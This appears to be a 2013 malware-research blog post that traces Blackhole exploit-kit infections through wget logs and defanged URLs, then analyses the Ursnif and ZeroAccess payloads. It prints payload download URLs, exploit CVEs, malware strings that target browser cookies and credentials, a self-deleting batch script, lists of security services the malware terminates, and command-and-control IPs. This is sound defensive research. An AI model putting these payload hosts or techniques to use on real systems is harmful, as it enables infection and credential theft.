Infection route:
Infector:    h00p://tropold.org/jerk.cgi?6
Redirector:  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Downloader1: h00p://painterinvoice.ru/ISRonx04zR50Jrd217..vN607Atz/getmyfile.exe?o=1&h=11
Lead to:     (same path)/imJTuXe.jar
Downloader2: h00p://painterinvoice.ru/3vzJEf0i1Ke0TEJU0NH..0mMLQ/getmyfile.exe?o=1&h=12
Payload:     h00p://fuji-solar.co.jp/date/dune.exe
Infectior hosts: 
Infector (hacked site): tropold.org       (209.8.45.242) Landing Page          : painterinvoice.ru (108.61.12.43) Payload (hacked site) : fuji-solar.co.jp  (60.43.201.33)
PoC:
Infector: 
// download

--2013-02-03 02:22:15--  h00p://tropold.org/jerk.cgi?6
Resolving tropold.org... seconds 0.00, 209.8.45.242
Caching tropold.org => 209.8.45.242
Connecting to tropold.org|209.8.45.242|:80... seconds 0.00, connected.
  :
GET /jerk.cgi?6 HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: tropold.org
  :
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 19:03:31 GMT
Server: Apache
Set-Cookie: thlpg6=_1_; expires=Sun, 03-Feb-2013 19:03:31 GMT; path=/; domain=tr
opold.org
Connection: close
Content-Type: text/html; charset=UTF-8
  :
200 OK
Length: unspecified [text/html]
Saving to: `jerk.cgi@6.1"
2013-02-03 02:22:15 (1.49 MB/s) - `jerk.cgi@6.1' saved [182]"

// cat

＜html＞＜frameset rows="100%"＞
＜frame src="h00p://painterinvoice.ru/...U0XFea"＞
＜/frameset＞
＜/html＞
Redirectors: 
// download

--2013-02-03 02:23:29--  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5
B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
  :
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
  :
HTTP/1.0 302 Found
Set-Cookie: PHPSESSID=2pt94m2itjr49i320maohs0r30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Location: h00p://painterinvoice.ru/..0fzIh0oYGU0XFea/
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:06 GMT
  :
302 Found
  :
Location: h00p://painterinvoice.ru/1yM1hP12ju..zIh0oYGU0XFea/ [following]
Skipping 0 bytes of body: [] done.
--2013-02-03 02:23:30--  h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08q...2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Reusing existing connection to painterinvoice.ru:80.
  :
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/ HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
  :
HTTP/1.0 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Content-Length: 490
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:07 GMT
  :
200 OK
Length: 490 [text/html]
Saving to: `index.html"
2013-02-03 02:23:31 (13.4 MB/s) - `index.html saved [490/490]"

// cat

＜html＞
＜head＞
＜title＞TTklldd＜/title＞
＜/head＞
＜body＞
＜applet archive="imJTuXe.jar" code="kobCA.Qbyka" name="vNOArj"＞
＜param name="p" value="h00p://painterinvoice.ru/ISRonx04...607Atz/getmyfile.exe?o=1&h=11"/＞
＜/applet＞
＜script type="text/javascript" src="rtoplsf.js"＞＜/script＞
＜/body＞
＜/html＞
Downloader:
↑See the ISRonx04...607Atz/getmyfile.exe?o=1&h=11, is a downloader scheme of this exploit kit. It forward you to the JAR download url: 
h00p://painterinvoice・ru/spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar
Download... 
--2013-02-03 02:26:40--  h00p://painterinvoice.ru/spM4XE..ujSn/imJTuXe.jar
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
  :
GET /spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
  :
HTTP/1.0 200 OK
Set-Cookie: PHPSESSID=d8l9gc7g9vbg0poai41h97r7c6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Connection: close
Date: Sat, 02 Feb 2013 17:30:16 GMT
  :
200 OK
Length: unspecified [text/html]
Saving to: `imJTuXe.jar"
2013-02-03 02:26:41 (14.5 KB/s) - `imJTuXe.jar saved [12996]"
Exploitation
The target privilege: The flood: CVE-2012-1723 CVE-2012-4681 This JAR at Virus Total, URL -->>[HERE]
SHA256: ca601ec85cc7bc2afa82384a1b832401af281e476021b1db59201bb8d0936211 SHA1: e3f1b938ef96c139b948c6bd9cc69d7c2dec0643 MD5: 9c4ca2083a2c4cd518897ab59df3a15c File size: 12.7 KB ( 12996 bytes ) File name: imJTuXe.jar File type: JAR Tags: exploit jar cve-2012-1723 cve-2012-4681 Detection ratio: 10 / 46 Analysis date: 2013-02-03 08:07:39 UTC ( 2 hours, 36 minutes ago )
Malware names: 
DrWeb                    : Exploit.CVE2012-1723.13
GData                    : Java:CVE-2012-1723-VT
AntiVir                  : EXP/2012-1723.GE
TrendMicro               : HEUR_JAVA.EXEC
McAfee-GW-Edition        : Exploit-CVE2012-1723.c
Avast                    : Java:CVE-2012-1723-VT [Expl]
ESET-NOD32               : probably a variant of Java/Exploit.CVE-2012-1723.FR
McAfee                   : Exploit-CVE2012-1723.c
Ikarus                   : Java.CVE.2012
Sophos                   : Troj/JavaDl-NZ
The JAR resulted the below URL: 
h00p://painterinvoice.ru/3vzJE..(long)..0mMLQ/getmyfile.exe?o=1&h=12
Payload:
Again we met "..0mMLQ/getmyfile.exe" downloader, which now pointing to the below payload url: 
h00p://fuji-solar.co.jp/date/dune.exe
It's still up there..(make the necessary warning though...) Download log: 
GET /date/dune.exe HTTP/1.0
User-Agent: MalwareMustDie! You are famous now!
Host: fuji-solar.co.jp
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 17:20:04 GMT
Server: Rapidsite/Apa
Last-Modified: Sat, 02 Feb 2013 12:26:52 GMT
ETag: "35dd625-37400-510d060c"
Accept-Ranges: bytes
Content-Length: 226304
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/exe
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 226304 (221K) [application/exe]
"Saving to: `dune.exe"
Payload at Virus Total, url is here -->>[HERE]
SHA256: 0e61ecd0aad87a72d36bc10288303292859a800d2237ac9c32755d9e455e87e2 SHA1: a7344edd33d4bcd538fdba240c2996417a0d63b8 MD5: a26ff2a7664aaa03d41a591fc71d2221 File size: 221.0 KB ( 226304 bytes ) File name: dune.exe File type: Win32 EXE Tags: peexe Detection ratio: 3 / 46 Analysis date: 2013-02-03 07:09:05 UTC ( 38 minutes ago )
Malware Name: 
TrendMicro-HouseCall     : TROJ_GEN.F47V0202
DrWeb                    : Trojan.KillProc.22029
Symantec                 : WS.Reputation.1
↑Low detection. It looks we will see many infection happened.. I wrote the quick analysis on this malware in VT comment, with additional information below:  As per I wrote in VT comment, this malware killed explorer.exe & started the new one, as per I reproduced below:  How this malware did it? and what for? below could be the answer:  First, it creates: 1958718(RANDOM).bat in the current directory. PoC traces: 
"WriteFile","C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat",
            "SUCCESS","Offset: 0, Length: 72"
And executed it with CMD command to re-run explorer & delete the malware files: 
"Process Create","C:\WINDOWS\system32\cmd.exe","SUCCESS","PID: 2916, 
                  Command line: 
                  cmd /c """"C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat""
With the batch command below: 
(361): /sd %lu
(363): %lu.bat                     "
(364): attrib -r -s -h %%1
(365): del %%1
(366): if exist %%1 goto %u
(367): del %%0
(369): %s\explorer.exe"
This act is to hide the real malware activities and to delete the  malware files from the PC after being executed.  What had happened during the explorer.exe being terminated was: It created C:\WINDOWS\system32\fastinit.exe(RANDOM) (a self copy) & make it autostart  in registry with setting key/values: 
"CreateFile","C:\WINDOWS\system32\fastinit.exe","SUCCESS", OpenResult: Created"
"RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist(RANDOM)","SUCCESS","
   Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
NOTE: The malware choosed the name of file to be copied itself AFTER investigating what EXE files is actually exist in your PC and choosed one of them for the target to copy, PoC -->>[HERE] Furthermore the randomization also used to pick autostart registry key name, Like in this case was Windows\CurrentVersion\Run\helplist, while in VT I detected \Windows\CurrentVersion\Run\autocnfg, while VT behavior test itself shows: \Windows\CurrentVersion\Run\blassmgr.  The rest of changes in registry is as per below: 
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist","SUCCESS","Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal","SUCCESS","Type: REG_SZ, Length: 86, Data: C:\Documents and Settings\%USER%\My Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache","SUCCESS","Type: REG_SZ, Length: 140, Data: C:\Documents and Settings\%USER%\Local Settings\Temporary Internet Files"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{11948642-10a9-11e2-95b6-806d6172696f}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{903f3d4c-6ae4-11e2-91fb-0012f0e93e3e}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents","SUCCESS","Type: REG_SZ, Length: 92, Data: C:\Documents and Settings\All Users\Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop","SUCCESS","Type: REG_SZ, Length: 74, Data: C:\Documents and Settings\%USER%\%DESKTOP%"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
Since the malware binary file was encrypted so we can't see much of it, if you see the binary in the section .text it will appear like this: 
File: dune.exe; Section: .text
Encrypted part:
0x0004FF   0x0004FF     ＞====
0x000515   0x000515     ====6?y＞6?y
0x00052B   0x00052B     5=Hh2
0x000531   0x000531     2====a
0x00055B   0x00055B     c＞====
0x000582   0x000582     ＞?Ay=|=
0x0005A9   0x0005A9     Rn=y=
0x0005AF   0x0005AF     35Ln=y=
0x0005E0   0x0005E0     3＞====
0x000610   0x000610     ===g===
0x00062D   0x00062D     %,A＞h
0x000645   0x000645     a5===
0x0006BD   0x0006BD     n====g==5==
   :          :           :
0x03646F   0x03646F     R |=A3
0x03662A   0x03662A     %H2%n?
0x036642   0x036642     A57 ＞
0x03668E   0x03668E     ＞6=dg＞ 
The complete list is here -->>[HERE] but after being decrypted we start to understand how it works better. The section .rdata will appear contains the some values. We can see the list of calls is here -->>[HERE]And the breakdown of the stealer++ activities as per below:  Some comment of malware coder with the mis-spelled words: 
.rdata:100124E4 00000010 C Sart Load DLL\r\n                  
.rdata:100124F4 0000001D C Loading DLL: \"%s\" size: %d\r\n   
.rdata:10012514 00000012 C Start Write DLL\r\n                
.rdata:10012528 00000016 C DLL load status: %u\r\n            
.rdata:10012658 0000001C C Started Soccks status {%u\n}       
.rdata:10012674 00000014 C Get info status %u\n               
.rdata:10012688 00000017 C Command received \"%s\"\n          
.rdata:100126A0 0000000C C MakeScreen\n                       
So it supposed to connect to internet... 
.rdata:10012C64 00000008 C http://                       
.rdata:10012C6C 00000009 C https://                 
.rdata:10012A94 00000006 C Host:                         
.rdata:10012A9C 0000000C C User-Agent:                   
.rdata:10012AA8 00000010 C Content-Length:               
.rdata:10012AB8 00000013 C Transfer-Encoding:            
.rdata:10012BDC 0000000A C text/html                     
.rdata:10012BE8 00000006 C image                         
.rdata:10012BF0 0000000A C Referer:   
.rdata:10012BFC 0000001A C URL: %s\r\nuser=%s\r\npass=%s 
While these shows what it grabs.. (Ursnif trade mark) 
.rdata:10012CA4 00000005 C @ID@       
.rdata:10012CB0 00000008 C @GROUP@    
.rdata:10012CB8 00000007 C grabs=     
.rdata:10012CC0 00000008 C NEWGRAB    
.rdata:10012CC8 0000000B C SCREENSHOT 
.rdata:10012CD4 00000008 C PROCESS    
.rdata:10012CDC 00000007 C HIDDEN     
.rdata:10012CE4 00000005 C @%s@       
.rdata:10012CEC 00000005 C http       
.rdata:10012CF4 00000005 C POST       
.rdata:10012CFC 0000000A C URL: %s\r\n
..or this one will show you better... 
.rdata:10012948 0000001D C cmd /C \"systeminfo.exe > %s\"    
.rdata:10012968 0000001B C failed start sysinfo - %u\n       
.rdata:10012984 0000001D C cmd /C \"echo -------- >> %s\"    
.rdata:100129A4 00000021 C cmd /C \"tasklist.exe /SVC >> %s\"
.rdata:100129C8 0000001C C failed start tasklist - %u\n      
.rdata:100129E4 0000001F C cmd /C \"driverquery.exe >> %s\"  
.rdata:10012A04 0000001A C failed start driver - %u\n
.rdata:10012A20 0000005B C cmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s >> %s\
.rdata:10012A7C 00000015 C failed get reg - %u\n
The credentials targetted.... 
0x010F44   \Mozilla\Firefox\Profiles\
0x010F7C   cookies.sqlite
0x010F9C   cookies.sqlite-journal
0x010FCC   \Macromedia\Flash Player\
0x011000   *.sol
0x01100C   *.txt
0x011018   \sols
0x011024   \cookie.ie
0x01103C   \cookie.ff
0x011678   image/gif
We'll see usage of PHP form on the server side: 
.rdata:100126E8 00000005 C form
.rdata:100126F0 0000004B C /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
.rdata:10012758 0000007B C version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%08X&wake=%u&prjct=%d&arch=%u&inf=0&os=%u.%u.%u&guid=%u.%u.%u!%s!%08X 
.rdata:100127D8 0000000D C /c%s.php?%s=
        :
.rdata:10012E10 00000042 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"
.rdata:10012E58 00000048 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"
.rdata:10012EA0 00000027 C --------------------------%04x%04x%04x
.rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s
.rdata:10012EF8 0000000B C \r\n--%s--\r\n
.rdata:10012F04 00000027 C Content-Type: application/octet-stream
.rdata:10012F2C 00000011 C --%s\r\n%s\r\n%s\r\n\r\n
Setting target directory for grabbing sruff 
.rdata:100128A4 0000001B C .set DiskDirectory1=\"%s\"\r\n  
.rdata:100128C0 00000019 C .set CabinetName1=\"%s\"\r\n    
.rdata:100128DC 00000007 C \"%s\"\r\n                      
.rdata:100128EC 0000001B C .set DestinationDir=\"%S\"\r\n  
.rdata:1001290C 00000007 C \"%S\"\r\n                      
And making CAB archive of the target.. 
.rdata:10012914 00000014 C makecab.exe /F \"%s\
I thank you @EP_X0FF kernel mode for the very good help solving this mistery. It is a PWS variant alright, with the malware name of Trojan Ursnif.The complete list of the .RDATA section is here-->>[HERE]
Samples
*) We share samples for research purpose & raising detection ratio of this infection. Infection sample set -->>[HERE]The malware complete recorded process can be download in archive here -->>[HERE] Thank's to @kafeine for the infection info.  

[NEW!] New case infection w/same payload type & infection MO in different domain.
Landing page: 3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Payload: ZeroAccess
Exploit: Java: #CVE-2010-4476 #CVE-2013-0422, PDF: #CVE-2010-0188, CVE-2009-0927
Sorry for the report in text-->http://pastebin.com/raw.php?i=HPESHngh

33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Got so attempted so I fetched: 
--2013-02-05 21:45:24--  h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Resolving 33sdfguuh.mywww.biz... seconds 0.00, 89.253.232.149
Caching 33sdfguuh.mywww.biz => 89.253.232.149
Connecting to 33sdfguuh.mywww.biz|89.253.232.149|:80... seconds 0.00, connected.
  :
"GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0"
Referer: http://malwaremustdie.com
"Host: 33sdfguuh.mywww.biz"
  :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 12:45:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
Saving to: "209tuj2dsljdglsgjwrigslgkjskga.php"
"2013-02-05 21:45:27 (90.4 KB/s) - 209tuj2dsljdglsgjwrigslgkjskga.php saved [113594]"
The inside was the common Backhole v2.x's landing Page ofuscation, which manually cracked to be plugin detect script like this -->>[PASTEBIN] Some of the highlight are below: 
1. The usage of the pair of directories of /closest/ &  2. they don't put shellcode or the malware payload download in the landing page,     instead scattered in the exploit file infector. 3. two pdfs, two jars and one payload.
BHEK is BHEK, by using our guideline -->>[HERE] you can get these samples: FYI the 2 PDFs urls is are as per below (this is for people who got attack by these Blackhole which mostly seeing these PDF downloads URL in their log..) 
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?dsmq=30:1n:1i:1i:33&lllsxi=3g:3a:3c&bdm=30:33:1n:1m:1h:33:30:1o:30:1h&uzz=1k:1d:1f:1d:1g:1d:1f
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?qbzntsus=30:1n:1i:1i:33&cazv=39&alltb=30:33:1n:1m:1h:33:30:1o:30:1h&mkitrggt=1k:1d:1f:1d:1g:1d:1f
I started to get the payload from the smallest size of PDF, to find the JS/Evil/Code written in the 0x11AF-0x2768 section with text below: The red mark is the evil script, where the purple mark is the long  obfuscation var/array, and the yellow mark is the deobfuscator logic.  Following the usual method to decode this, we'll find the infector script burped as per first upper part below, marked area is the shellcode in text: And the lower part which having Libtiff overflow CVE-2010-0188 exploit code: *) Noted: I marked the part it checked the Adobe version.  Well shortly the shellcode will look like below, contains the payload's url: Well, I just downloaded it.. 
GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&ofa=30:33:1n:1m:1h:33:30:1o:30:1h&omtvgame=1i&tdn=trnwuek&hxx=ynkt HTTP/1.0
Referer: http://malwaremustdie.blogspot.com
User-Agent: Gottcha!
Host: 33sdfguuh.mywww.biz
 :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 13:17:33 GMT
Content-Type: application/x-msdownload
Content-Length: 176128
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Tue, 05 Feb 2013 13:17:40 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
  :
200 OK
Registered socket 1892 for persistent reuse.
Length: 176128 (172K) [application/x-msdownload]
Saving to: `contacts.exe'
2013-02-05 22:17:37 (84.9 KB/s) - `contacts.exe' saved [176128/176128]
Now we have the payload below: *)Noted: I marked my local time of my PC when I fetched.          Nothing special about the file's looks & dull-usual name of contacts.exe 
Debug investigation of the payload
So it's time to debug it to understand:  1. First the moronz encrypted the binary, see -->>[HERE]   the section .text and .data was garbled,     trailing the bins made me only stuck at the 0x40A209 in .text section: 
0x40A209  add     esi, 1Fh
0x40A20C  pushf
0x40A20D  or      word ptr [esp], 1
0x40A212  nop
0x40A213  popf
0x40A214  wait
0x40A215  push    ebp
0x40A216  wait
0x40A217  pop     ebp
0x40A218  nop
0x40A219  rep cld
0x40A21B  jb      loc_40A49D
0x40A221  pop     ds
0x40A222  pop     ds
0x40A223  cmp     dl, bh
0x40A225  push    ecx
  : (skip)
0x40A229  var_44 = word ptr -6583D684h
0x40A229  var_42 = byte ptr -6583D682h
0x40A229  var_25 = byte ptr -6583D665h
0x40A229  var_23 = byte ptr -6583D663h
   : (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40A6EF 
0x40A2F9 ; FUNCTION CHUNK AT 0x40A839 
0x40A2F9 ; FUNCTION CHUNK AT 0x40A874 
  : (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC08 
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC63 
2. Shortly I figured some mistery by debugging it to find these clue:  This mess loading DLL by using these methods.. 
LdrLoadDll
LdrGetDllHandle
Use below command to decrypt: 
uncrypted.exe
Microsoft Base Cryptographic Provider v1.0
Detecting/search the below programs / services: 
Windows Defender
wscntfy.exe
MSASCui.exe
MpCmdRun.exe
NisSrv.exe
msseces.exe
fp.exe
 :
MsMpSvc
windefend
SharedAccess
iphlpsvc
wscsvc
mpssvc
Debugged further to find that this malware stopping these processes: 
MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
PoC code in ASM here -->>[PASTEBIN]Looks also erasing/throwing off something via registry: 
RECYCLER\
$Recycle.Bin\
With some more registry traces... 
InprocServer32
{fbeb8a05-beee-4442-804e-409d6c4515e9}
\registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
  :
A nice attempt to use his filename to save itself..  
TEMP=
\InstallFlashPlayer.exe
Internet access command -1- Get GeoIP Info & safe/get CN code.. 
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
  :
geoip_country_code
If you simulate this into your browser, you'll get your all GeoIP data + lat/long coordinates.Internet access command -2- get the counter... 
GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
Host: bigfatcounters.com
User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
Connection: close
I dumped this data from memory after fetching the last URL above... ↑oh.. is an image file.. a counter↓ 
Behavior Analysis
So what was happened when I run it? It was as per below snapshot: The execution of CMD for self (copy+)deletion.. It requests the DNS query to the google, AND to these specific IP!↓ 
194.165.17.3:53  ADM-SERVICE-NET (Monaco)
66.85.130.234:53 TechEVE Ltd TE-SAFESUGAR (UK)
Except the above http, I detected UDP request to access these IP/port: 
92.254.253.254:16464
88.254.253.254:16464
87.254.253.254:16464
71.254.253.254:16464
69.254.253.254:16464
1.172.141.253:16464
122.110.95.253:16464
85.86.69.253:16464
90.230.2.2:16464
115.31.23.2:16464
174.101.87.249:16464
187.74.74.249:16464
61.86.42.249:16464
194.165.17.3:123
91.242.217.247:123
94.183.234.248:16464
180.254.253.254:16464
166.254.253.254:16464
135.254.253.254:16464
134.254.253.254:16464
119.254.253.254:16464
117.254.253.254:16464
115.254.253.254:16464
126.13.87.248:16464
89.215.205.2:16464
222.109.23.4:16464
203.171.244.4:16464
109.90.149.240:16464
173.217.73.3:16464
98.26.183.2:16464
84.55.11.24:16464
116.73.35.4:16464
86.126.1.74:16464
121.242.162.55:16464
175.181.230.42:16464
190.208.75.36:16464
150.214.68.251:16464
188.6.88.61:16464
206.254.253.254:16464
190.254.253.254:16464
182.254.253.254:16464
A short session of infection goes like this: And these are the snapshot of UDP, malform DNS requests  I was talking about: It sent the malform DNS with the request is like this: Any idea what is this, friends? :-) Furthermore let's see what's the file process & networking + registry-->>[HERE]Is a full run log on asession of one infection I made it on my PC :-) Please try to grep values like "RegSet" or "CreateFile", "UDP" to be more focus in understanding how this malware's work.  In registry there's some changes in: 
HKLM\Software\Classes\ClsId\{...some ID....}\InprocServer32\
   --→"C:\WINDOWS\system32\wbem\fastprox.dll"/"C:\RECYCLER\S-1-5-18\$6576a1a85f9fdb0e20568660563a58ee\n."
↑wow, looks like a setup for a deletion ...  Noticing the above, I just realized that my below registry keys were deleted/gone.. 
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Setup
..\System\CurrentControlSet\Services\SharedAccess\Setup\InterfacesUnfirewalledAtUpdate
..\System\CurrentControlSet\Services\wscsvc
..\System\CurrentControlSet\Services\wscsvc\Enum
..\System\CurrentControlSet\Services\wscsvc\Parameters
..\System\CurrentControlSet\Services\wscsvc\Security
Now  I know why it seeked those strings of programs in debugging, to DELETE them..  Moreover saw an a fail attempt of starting the Active Directory Domain Services Database  Mounting Tool or SERVICES_ACTIVE_DATABASE, binding to the localhost...  
What's this mess?
So we are dealing with what malware then? 1) a trojan (for sure, by all infection  MO & erasing stuffs) + staring service, but for what? I wonder what would happened if one of those request to had seccessfully established. IF it sent data then we have 2) a spyware which is having these characteristics.  Let's reseacrh further, viewing the way it made changes in registry at the  recycle keys/values made made me bumped to the good writing about ZeroAccess Recycler version here -->>[TigzyBlog]And UDP/16464 found it as the ZeroAccess/alias MaxPlus, Sirefef variant. Thank's to the Tigzy-RK for a useful writing -->Tigzy-RKAnd all of the advices I received, I thank you.  
Samples
Here's the overall samples -->>[HERE](Samples are shared for raising detection ratio & research purpose) *) Thank you to @Horgh_rce for adding the unpack version of the malware.    It's really good to know that I didn't miss a thing during debugging.  
Virus Total
Below is detection ratio as per detected moment of the samples in VT: 
Landing page : (1/46) -->>[VT]PDF1         : (20/46) -->>[VT]PDF2         : (13/46) -->>[VT]JAR1         : (6/46) -->>[VT]JAR2         : (5/46) -->>[VT]Payload      : (6/46) -->>[VT]
The Infection
I don't have time to check these all but all of these BHEK are infecting same ZeroAccess variant now. Marked the domain name & BHEK "/closest" path: The PoC of the list in the picture above is --->>[HERE] and here -->>[HERE]
Thank you for your help, advice & cooperation!
The trojan is the ZeroAccess recycler variant. Unpacked : 36e5a4019e41cc52247a558afc794b57— Horgh (@Horgh_rce) February 5, 2013
And I currently trace all infected machines (a lot more then 500,000 ip) you can contact me if you want more info.— Hugo Caron (@y0ug) February 5, 2013
Traffic on 16464/UDP - 16471/UDP is a sign of ZeroAccess trojan— Gary Portnoy (@gxp7891) February 6, 2013

Summary of analysis of a suspected CVE-2013-0634 sample

Summary

The malicious SWF checks/detects whether your system is x32 or x64, it provides both malwares and exploit scheme including the exploit data streams for both platforms (suspected two types of x32 & x64 a shellcodes also exist & still under investigation).

In my case upon the post exploitation it dropsstream-out"extract" a DLL malware file from the embedded binary object. The shellcode itself will drop a malware library into %Temp% path and execute it to drop the malware executable binary.

The extraction embedded attachment process is well explain in the Adobe API reference -->>[HERE]
Which I quoted as per below:

var storyByteArray:ByteArrayAsset = ByteArrayAsset(new storyClass());

To be NOTED: the binaries are not encoded in JS/code parts, JS/code was used for exploitation act.
The post exploit itself runs the function x32 or x64 to extract the object. Which are windows x32 and x64 DLL files. It is aiming ONLY for windows platform, with aiming exploitation for flash versions:

      11,5,502,146    11,4,402,287
      11,5,502,135    11,4,402,278
      11,5,502,110    11,4,402,265

